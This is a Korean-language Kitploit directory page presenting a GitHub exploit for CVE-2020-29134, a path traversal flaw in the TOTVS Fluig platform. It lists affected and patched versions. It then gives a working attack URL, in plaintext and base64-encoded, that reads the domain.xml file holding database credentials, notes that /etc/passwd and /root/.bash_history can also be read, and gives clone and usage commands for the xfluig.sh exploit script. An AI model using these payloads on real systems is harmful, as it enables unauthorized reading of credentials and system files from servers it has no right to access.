Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-29134 — CVE-2020-29134 익스플로잇 - TOTVS Fluig Platform - 경로 탐색 | Kitploit
도구/GitHubGitHub/ls4ss/cve-2020-29134
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubls4ss/cve-2020-29134

CVE-2020-29134

CVE-2020-29134 익스플로잇 - TOTVS Fluig Platform - 경로 탐색

저장소 보기
313년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Totvs Fluig 플랫폼

root@kitploit:~
 Fluig는 ERP 시스템 및 회사의 다른 시스템과 통합되어 사용자와 팀이 일하는 방식을
 혁신하는 생산성 및 협업 플랫폼입니다.

CVE-2020-29134

root@kitploit:~
 TOTVS Fluig 플랫폼은 base64로 인코딩된 매개변수를 통한 경로 탐색을 허용합니다.
 이 취약점이 악용되면 데이터베이스에 접근하기 위한 데이터가 포함된 민감한 XML 파일을 읽을 수 있으며,
 경우에 따라 LDAP 연결 및 ERP 시스템 통합 데이터도 읽을 수 있습니다.
 또한 /etc/passwd 및 /root/.bash_history와 같은 시스템 파일을 탐색할 수도 있습니다.
 

영향을 받는 버전

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

패치된 버전

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (패치됨)
<== Fluig 1.6.5-210308 (패치됨)
<== Fluig 1.6.4-210308 (패치됨)

페이로드 구축

alt text

공격 벡터

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

일반 텍스트 경로 탐색

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

base64로 인코딩된 경로 탐색

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

페이로드

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

Exploit-DB 참조

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

 

리포지토리 복제

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

사용법

root@kitploit:~
 예제 1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (wfuzz가 생성하는 요청 수)

 예제 2: ./xfluig.sh http://fluig.host.com:PORT
도구 다운로드